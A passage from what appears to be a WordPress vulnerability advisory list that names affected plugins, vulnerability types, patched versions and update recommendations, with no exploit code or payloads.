Recommended Action: Update to version 1.4.9, or a newer patched version

Plugin: Booking Calendar Contact Form

Vulnerability: Blind SQL Injection
Patched Version: 1.0.24
Recommended Action: Update to version 1.0.24, or a newer patched version

Plugin: Help Center by BestWebSoft

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.5
Recommended Action: Update to version 1.0.5, or a newer patched version

Plugin: Simple 301 Redirects By BetterLinks – Easy Redirect Manager for WP, 404 Error Log & More

Vulnerability: 2.0.3
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: Meta Slider and Carousel with Lightbox

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.7
Recommended Action: Update to version 1.7, or a newer patched version

Plugin: Unlimited Elements For Elementor (Free Widgets, Addons, Templates)

Vulnerability: Zip Extraction to Arbitrary File Upload in File Manager
Patched Version: 1.5.67
Recommended Action: Update to version 1.5.67, or a newer patched version

Plugin: Delete Duplicate Posts

Vulnerability: Missing Authorization via AJAX Actions
Patched Version: 4.9
Recommended Action: Update to version 4.9, or a newer patched version

Plugin: Wp-Insert

Vulnerability: No subtitle
Patched Version: 2.5.1
Recommended Action: Update to version 2.5.1, or a newer patched version

Plugin: Simple Local Avatars

Vulnerability: Regular Expression Denial of Service (ReDoS)
Patched Version: 2.7.4
Recommended Action: Update to version 2.7.4, or a newer patched version

Plugin: Custom Website Data

Vulnerability: Cross-Site Scripting
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: IP Metaboxes

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Popup Builder – Popup Forms and Marketing Lead Generation

Vulnerability: Missing Authorization and Cross-Site Request Forgery
Patched Version: 1.3.0
Recommended Action: Update to version 1.3.0, or a newer patched version

Plugin: post-views

Vulnerability: Cross-Site Scripting
Patched Version: 2.6.1.3
Recommended Action: Update to version 2.6.1.3, or a newer patched version

Plugin: Contact Form With Captcha

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Mailster

Vulnerability: Cross-Site Scripting
Patched Version: 1.5.5
Recommended Action: Update to version 1.5.5, or a newer patched version

Plugin: 10Web Booster – Website speed optimization, Cache & Page Speed optimizer

Vulnerability: Missing Authorization to Plugin Deactivation
Patched Version: 2.8.35
Recommended Action: Update to version 2.8.35, or a newer patched version

Plugin: WHOIS

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.2.3
Recommended Action: Update to version 1.4.2.3, or a newer patched version

Plugin: Themify Builder

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.3.2
Recommended Action: Update to version 5.3.2, or a newer patched version

Plugin: Appointment Hour Booking – WordPress Booking Plugin

Vulnerability: CAPTCHA Bypass
Patched Version: 1.3.73
Recommended Action: Update to version 1.3.73, or a newer patched version

Plugin: WSM Downloader

Vulnerability: Domain Bypass
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Related Posts for WordPress

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.0.5
Recommended Action: Update to version 2.0.5, or a newer patched version

Plugin: WP FEvents Book

Vulnerability: Authenticated (Subscriber+) Insecure Direct Object Reference to Booking Manipulation
Patched Version: 0.47
Recommended Action: Update to version 0.47, or a newer patched version

Plugin: MailMunch – Grow your Email List

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.1.3
Recommended Action: Update to version 3.1.3, or a newer patched version

Plugin: Search Analytics for WP

Vulnerability: Reflected Cross-Site Scripting via ‘render_stats_page’
Patched Version: 1.4.8
Recommended Action: Update to version 1.4.8, or a newer patched version

Plugin: RSVPMaker

Vulnerability: Unauthenticated SQL Injection
Patched Version: 10.6.7
Recommended Action: Update to version 10.6.7, or a newer patched version

Plugin: Cookie Law Bar

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Backup Migration

Vulnerability: Unauthenticated Sensitive Information Exposure
Patched Version: 1.3.6
Recommended Action: Update to version 1.3.6, or a newer patched version

Plugin: OAuth Single Sign On – SSO (OAuth Client)

Vulnerability: Cross-Site Request Forgery via ‘delete’ in mooauth_client_applist_page
Patched Version: 6.24.2
Recommended Action: Update to version 6.24.2, or a newer patched version

Plugin: Simple Author Box

Vulnerability: Cross-Site Request Forgery via save_user_profile
Patched Version: 2.51
Recommended Action: Update to version 2.51, or a newer patched version

Plugin: YOP Poll

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 6.1.2
Recommended Action: Update to version 6.1.2, or a newer patched version

Plugin: Better Messages – Live Chat for WordPress, BuddyPress, PeepSo, Ultimate Member, BuddyBoss

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.9.9.149
Recommended Action: Update to version 1.9.9.149, or a newer patched version

Plugin: GS Portfolio for Envato

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.4.0
Recommended Action: Update to version 1.4.0, or a newer patched version

Plugin: WP Customer Reviews

Vulnerability: Cross-Site Scripting
Patched Version: 3.0.9
Recommended Action: Update to version 3.0.9, or a newer patched version

Plugin: Hitsteps Web Analytics

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 5.87
Recommended Action: Update to version 5.87, or a newer patched version

Plugin: Pro Mime Types – Manage file media types

Vulnerability: Manage file media types <= 1.0.7
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: Comments – wpDiscuz

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 7.6.13
Recommended Action: Update to version 7.6.13, or a newer patched version

Plugin: Welcart e-Commerce

Vulnerability: Authenticated (Subscriber+) Arbitrary File Upload
Patched Version: 2.9.5
Recommended Action: Update to version 2.9.5, or a newer patched version

Plugin: WordPress Tooltips

Vulnerability: Multiple Cross-Site Request Forgery
Patched Version: 8.2.7
Recommended Action: Update to version 8.2.7, or a newer patched version

Plugin: ShortCodes UI

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: OMGF | GDPR/DSGVO Compliant, Faster Google Fonts. Easy.

Vulnerability: Authenticated (Admin+) Arbitrary Folder Deletion via Path Traversal
Patched Version: 4.5.12
Recommended Action: Update to version 4.5.12, or a newer patched version

Plugin: Address Autocomplete Using Google Place Api

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Just Custom Fields

Vulnerability: Missing Authorization on AJAX Actions
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Stop User Enumeration

Vulnerability: Cross-Site Scripting
Patched Version: 1.3.8
Recommended Action: Update to version 1.3.8, or a newer patched version

Plugin: Simple Ajax Chat – Add a Fast, Secure Chat Box

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 20220216
Recommended Action: Update to version 20220216, or a newer patched version

Plugin: Job Manager

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Broadcast Live Video – Live Streaming : HTML5, WebRTC, HLS, RTSP, RTMP

Vulnerability: Arbitrary File Upload
Patched Version: 4.29.5
Recommended Action: Update to version 4.29.5, or a newer patched version

Plugin: Content Control – The Ultimate Content Restriction Plugin! Restrict Content, Create Conditional Blocks & More

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.1.10
Recommended Action: Update to version 1.1.10, or a newer patched version

Plugin: The Events Calendar Countdown Addon

Vulnerability: Arbitrary Plugin Installation and Activation
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: Premium Portfolio Features for Phlox theme

Vulnerability: Unauthenticated Local File Inclusion
Patched Version: 2.3.2
Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: Better Search – Relevant search results for WordPress

Vulnerability: SQL Injection
Patched Version: 2.2.3
Recommended Action: Update to version 2.2.3, or a newer patched version

Plugin: Novo-Map : your WP posts on custom google maps

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ultimate Instagram Feed – WordPress Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Plugin: Sheets to WP Table Live Sync | Google Sheets Table Plugin for WordPress with Spreadsheet Integration – FlexTable

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.13.0
Recommended Action: Update to version 2.13.0, or a newer patched version

Plugin: Contact Form DB – Elementor

Vulnerability: Sensitive Information Disclosure
Patched Version: 1.6
Recommended Action: Update to version 1.6, or a newer patched version

Plugin: Envo Extra

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.8.4
Recommended Action: Update to version 1.8.4, or a newer patched version

Plugin: Integration for Billingo & Gravity Forms

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.4
Recommended Action: Update to version 1.0.4, or a newer patched version

Plugin: Ultimate Addons for Beaver Builder – Lite

Vulnerability: Cross-Site Scripting
Patched Version: 1.25.0
Recommended Action: Update to version 1.25.0, or a newer patched version

Plugin: Quiz Maker

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 6.4.2.7
Recommended Action: Update to version 6.4.2.7, or a newer patched version

Plugin: WP Customer Reviews

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.0.9
Recommended Action: Update to version 3.0.9, or a newer patched version

Plugin: Wholesale Suite – WooCommerce Wholesale Prices, B2B, Catalog Mode, Order Form, Wholesale User Roles, Dynamic Pricing & More

Vulnerability: Missing Authorization to Plugin Settings Change
Patched Version: 2.1.6
Recommended Action: Update to version 2.1.6, or a newer patched version

Plugin: Smart App Banner

Vulnerability: Cross-Site Request Forgery via wsl_smart_app_banner_options
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: Download Monitor

Vulnerability: Directory Listing to Information Disclosure
Patched Version: 1.6.4
Recommended Action: Update to version 1.6.4, or a newer patched version

Plugin: Comments Like Dislike

Vulnerability: Add Like/Dislike Bypass
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: Jetpack VaultPress

Vulnerability: Remote Code Execution
Patched Version: 1.9.1
Recommended Action: Update to version 1.9.1, or a newer patched version

Plugin: Interactive Polish Map

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: WooCommerce CVR Payment Gateway

Vulnerability: Missing Authorization to Authenticated (Contributor+) CVR Update
Patched Version: 6.1.0
Recommended Action: Update to version 6.1.0, or a newer patched version

Plugin: Qwizcards | online quizzes and flashcards

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.37
Recommended Action: Update to version 3.37, or a newer patched version

Plugin: Auto Affiliate Links

Vulnerability: Cross-Site Request Forgery via aalDeleteLink function
Patched Version: 6.3.0.1
Recommended Action: Update to version 6.3.0.1, or a newer patched version

Plugin: Videopack

Vulnerability: Full Path Disclosure
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: ProfileGrid – User Profiles, Groups and Communities

Vulnerability: Remote Code Execution
Patched Version: 2.8.6
Recommended Action: Update to version 2.8.6, or a newer patched version

Plugin: WP Recipe Maker

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 8.6.1
Recommended Action: Update to version 8.6.1, or a newer patched version

Plugin: Twitter Cards Meta – Best Twitter Card Plugin for WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.5.0
Recommended Action: Update to version 2.5.0, or a newer patched version

Plugin: Login rebuilder

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: Post Timeline

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.2.6
Recommended Action: Update to version 2.2.6, or a newer patched version

Plugin: DirectoryPress – Business Directory And Classified Ad Listing

Vulnerability: Missing Authorization
Patched Version: 3.6.3
Recommended Action: Update to version 3.6.3, or a newer patched version

Plugin: SRS Simple Hits Counter

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Futurio Extra

Vulnerability: Cross-Site Request Forgery via ‘futurio_extra_reset_mod’
Patched Version: 1.8.3
Recommended Action: Update to version 1.8.3, or a newer patched version

Plugin: Go Pricing – WordPress Responsive Pricing Tables

Vulnerability: WordPress Responsive Pricing Tables <= 3.3.19
Patched Version: 3.4
Recommended Action: Update to version 3.4, or a newer patched version

Plugin: Social Media Share Buttons & Social Sharing Icons

Vulnerability: Unspecified Vulnerabilities
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: Event Calendar WD version

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.51
Recommended Action: Update to version 1.1.51, or a newer patched version

Plugin: Easy Ad Manager

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Occasions

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Autoptimize

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting via Critical CSS Settings
Patched Version: 3.1.1
Recommended Action: Update to version 3.1.1, or a newer patched version

Plugin: Gmedia Photo Gallery

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 0.9.4
Recommended Action: Update to version 0.9.4, or a newer patched version

Plugin: BuddyPress Global Search

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Spiffy Calendar

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.3.0
Recommended Action: Update to version 3.3.0, or a newer patched version

Plugin: WDSocialWidgets

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.11
Recommended Action: Update to version 1.0.11, or a newer patched version

Plugin: User Meta Manager

Vulnerability: Authenticated Blind SQL Injection
Patched Version: 3.4.7
Recommended Action: Update to version 3.4.7, or a newer patched version

Plugin: bbPress Members Only

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Plugin: DH – Anti AdBlocker

Vulnerability: Cross-Site Request Forgery
Patched Version: 37
Recommended Action: Update to version 37, or a newer patched version

Plugin: SysBasics Customize My Account for WooCommerce

Vulnerability: Cross-Site Request Forgery via restore_my_account_tabs
Patched Version: 1.8.4
Recommended Action: Update to version 1.8.4, or a newer patched version

Plugin: WP Email Users

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: MW WP Form

Vulnerability: Directory Traversal via _file_upload
Patched Version: 4.4.3
Recommended Action: Update to version 4.4.3, or a newer patched version

Plugin: YourChannel: Everything you want in a YouTube plugin.

Vulnerability: Cross-Site Request Forgery to Plugin Language Translation Reset
Patched Version: 1.2.5
Recommended Action: Update to version 1.2.5, or a newer patched version

Plugin: Brands for WooCommerce

Vulnerability: Missing Authorization to Unauthenticated Order Manipulation and Information Retrieval
Patched Version: 3.8.2.3
Recommended Action: Update to version 3.8.2.3, or a newer patched version

Plugin: WP Multiple Meta Box

Vulnerability: SQL Injection
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: ImmoPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: KB Support – Customer Support Ticket & Helpdesk Plugin, Knowledge Base Plugin

Vulnerability: Authenticated (Subscriber+) CSV Injection
Patched Version: 1.5.85
Recommended Action: Update to version 1.5.85, or a newer patched version

Plugin: WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 9.1.3
Recommended Action: Update to version 9.1.3, or a newer patched version

Core: WordPress

Vulnerability: Mishandling Post Meta Values via XML-RPC
Patched Version: 3.7.21
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.21, 3.8.21, 3.9.19, 4.0.18, 4.1.18, 4.2.15, 4.3.11, 4.4.10, 4.5.9, 4.6.6, 4.7.5

Plugin: SI Captcha Anti-spam

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.7.6
Recommended Action: Update to version 2.7.6, or a newer patched version

Plugin: Elementor Website Builder – More than Just a Page Builder

Vulnerability: Unauthenticated DOM-based Reflected Cross-Site Scripting
Patched Version: 3.5.6
Recommended Action: Update to version 3.5.6, or a newer patched version

Plugin: Pay With Tweet

Vulnerability: Cross-Site Scripting
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: WP Database Backup – Unlimited Database & Files Backup by Backup for WP

Vulnerability: Unauthenticated Settings Update to Remote Code Execution
Patched Version: 5.1.3
Recommended Action: Update to version 5.1.3, or a newer patched version

Plugin: WordPress Contact Forms by Cimatti

Vulnerability: Cross-Site Request Forgery via _accua_forms_form_edit_action
Patched Version: 1.5.8
Recommended Action: Update to version 1.5.8, or a newer patched version

Plugin: Store Locator Plus® for WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 4.5.12
Recommended Action: Update to version 4.5.12, or a newer patched version

Plugin: Google Authenticator – WordPress 2FA, OTP SMS and Email

Vulnerability: Cross-Site Scripting
Patched Version: 5.4.40
Recommended Action: Update to version 5.4.40, or a newer patched version

Plugin: WordPress Старт

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.8
Recommended Action: Update to version 3.8, or a newer patched version

Plugin: Slider Pro

Vulnerability: Missing Authorization via AJAX actions
Patched Version: 4.8.7
Recommended Action: Update to version 4.8.7, or a newer patched version

Plugin: Simple URLs – Link Cloaking, Product Displays, and Affiliate Link Management

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 119
Recommended Action: Update to version 119, or a newer patched version

Plugin: Wow Moodboard Lite

Vulnerability: Open Redirect
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: JobBoardWP – Job Board Listings and Submissions

Vulnerability: Unauthenticated Arbitrary File Upload
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: WP Customer Reviews

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.6.7
Recommended Action: Update to version 3.6.7, or a newer patched version

Plugin: Simple Like Page Plugin

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: Annonces

Vulnerability: Arbitrary File Upload
Patched Version: 1.2.0.2
Recommended Action: Update to version 1.2.0.2, or a newer patched version

Plugin: Compfight

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5
Recommended Action: Update to version 1.5, or a newer patched version

Plugin: wp-forum

Vulnerability: Multiple SQL Injections
Patched Version: 2.4
Recommended Action: Update to version 2.4, or a newer patched version

Plugin: Recently

Vulnerability: Arbitrary File Upload to Remote Code Execution
Patched Version: 3.0.5
Recommended Action: Update to version 3.0.5, or a newer patched version

Plugin: OptionTree

Vulnerability: Object Injection Bypass
Patched Version: 2.7.3
Recommended Action: Update to version 2.7.3, or a newer patched version

Plugin: SB Child List

Vulnerability: Cross-Site Request Forgery via ‘sb_cl_update_settings’
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: MainWP Child – Securely Connects to the MainWP Dashboard to Manage Multiple Sites

Vulnerability: Authentication Bypass
Patched Version: 3.4.5
Recommended Action: Update to version 3.4.5, or a newer patched version

Plugin: Animator – Scroll Triggered Animations

Vulnerability: Missing Authorization to Plugin Settings Update
Patched Version: 3.0.11
Recommended Action: Update to version 3.0.11, or a newer patched version

Plugin: WebARX

Vulnerability: Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Advanced WordPress Reset – Debug, Recover & Reset WP

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.6
Recommended Action: Update to version 1.6, or a newer patched version

Plugin: MyBookTable Bookstore by Stormhill Media

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.2.3
Recommended Action: Update to version 3.2.3, or a newer patched version

Plugin: AGCA – Custom Dashboard & Login Page

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 7.0
Recommended Action: Update to version 7.0, or a newer patched version

Plugin: Jetpack – WP Security, Backup, Speed, & Growth

Vulnerability: Security Bypass
Patched Version: 1.9.4
Recommended Action: Update to one of the following versions, or a newer patched version: 1.9.4, 2.0.9, 2.1.4, 2.2.7, 2.3.7, 2.4.4, 2.5.2, 2.6.3, 2.7.2, 2.8.2, 2.9.3

Plugin: Tabs – Responsive Tabs with WooCommerce Product Tab Extension

Vulnerability: Unauthenticated Arbitrary Option Update
Patched Version: 3.6.0
Recommended Action: Update to version 3.6.0, or a newer patched version

Plugin: Loan Repayment Calculator and Application Form

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.9.4
Recommended Action: Update to version 2.9.4, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Request Forgery to Denial of Service
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: My Account Page Editor

Vulnerability: Authenticated (Subscriber+) Arbitrary File Upload
Patched Version: 1.3.2
Recommended Action: Update to version 1.3.2, or a newer patched version

Plugin: Welcart e-Commerce

Vulnerability: Authenticated (Subscriber+) Arbitrary File Read
Patched Version: 2.8.5
Recommended Action: Update to version 2.8.5, or a newer patched version

Plugin: SlimStat Analytics

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 4.8.4
Recommended Action: Update to version 4.8.4, or a newer patched version

Plugin: Forminator Forms – Contact Form, Payment Form & Custom Form Builder

Vulnerability: SQL Injection
Patched Version: 1.6
Recommended Action: Update to version 1.6, or a newer patched version

Plugin: Page View Count

Vulnerability: Contributor+ Stored Cross-Site Scripting
Patched Version: 2.4.9
Recommended Action: Update to version 2.4.9, or a newer patched version

Plugin: WP Booking Calendar

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 9.7.3.1
Recommended Action: Update to version 9.7.3.1, or a newer patched version

Plugin: TJ Shortcodes

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Maps – Display Google Maps Perfectly with Ease

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.3.10
Recommended Action: Update to version 2.3.10, or a newer patched version

Plugin: Simple JWT Login – Allows you to use JWT on REST endpoints.

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.2.1
Recommended Action: Update to version 3.2.1, or a newer patched version

Plugin: 3DPrint

Vulnerability: Cross-Site Request Forgery to Arbitrary File Deletion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Image Protector

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Social Connect

Vulnerability: Cross-Site Scripting
Patched Version: 0.10.2
Recommended Action: Update to version 0.10.2, or a newer patched version

Plugin: Stop User Enumeration

Vulnerability: Security Bypass
Patched Version: 1.2.5
Recommended Action: Update to version 1.2.5, or a newer patched version

Plugin: WP Review Slider

Vulnerability: SQL Injection
Patched Version: 11.0
Recommended Action: Update to version 11.0, or a newer patched version

Plugin: Charitable – Donation Plugin for WordPress – Fundraising with Recurring Donations & More

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.6.51
Recommended Action: Update to version 1.6.51, or a newer patched version

Plugin: WP Frontend Profile

Vulnerability: Privilege Escalation
Patched Version: 0.2.2
Recommended Action: Update to version 0.2.2, or a newer patched version

Plugin: HTML5 Audio Player- Best WordPress Audio Player Plugin

Vulnerability: Contributor+ Stored Cross-Site Scripting
Patched Version: 2.1.3
Recommended Action: Update to version 2.1.3, or a newer patched version

Plugin: Defa Online Image Protector Free Edition

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: CPO Shortcodes

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Sales Report Email for WooCommerce

Vulnerability: Missing Authorization for Email Functionality
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Essential Blocks – Page Builder Gutenberg Blocks, Patterns & Templates

Vulnerability: Missing Authorization via save
Patched Version: 4.0.7
Recommended Action: Update to version 4.0.7, or a newer patched version

Plugin: WP Better Permalinks

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.0.5
Recommended Action: Update to version 3.0.5, or a newer patched version

Plugin: MPL-Publisher — Ebook & Audiobook Creator

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.30.3
Recommended Action: Update to version 1.30.3, or a newer patched version

Plugin: Tweet Wheel

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.3.3
Recommended Action: Update to version 1.0.3.3, or a newer patched version

Plugin: SearchWP Live Ajax Search

Vulnerability: Sensitive Information Disclosure
Patched Version: 1.6.2
Recommended Action: Update to version 1.6.2, or a newer patched version

Plugin: WP Visitor Statistics (Real Time Traffic)

Vulnerability: Unauthenticated SQL Injection
Patched Version: 6.9
Recommended Action: Update to version 6.9, or a newer patched version

Plugin: Link Library

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 7.4.1
Recommended Action: Update to version 7.4.1, or a newer patched version

Plugin: Happy Addons for Elementor Pro

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.17.0
Recommended Action: Update to version 1.17.0, or a newer patched version

Plugin: Registration Forms – User Registration Forms, Invitation-Based Registrations, Front-end User Profile, Login Form & Content Restriction

Vulnerability: Authenticated SQL Injection
Patched Version: 2.0.19
Recommended Action: Update to version 2.0.19, or a newer patched version

Plugin: Buy Me a Coffee – Button and Widget Plugin

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.7
Recommended Action: Update to version 3.7, or a newer patched version

Plugin: Easy Cookies Policy

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Essential Addons for Elementor Pro

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.4.9
Recommended Action: Update to version 5.4.9, or a newer patched version

Plugin: Hospital Management System for WordPress

Vulnerability: SQL Injection
Patched Version: 22-05-2018
Recommended Action: Update to version 22-05-2018, or a newer patched version

Plugin: postTabs

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Slider by 10Web – Responsive Image Slider

Vulnerability: SQL Injection
Patched Version: 1.2.36
Recommended Action: Update to version 1.2.36, or a newer patched version

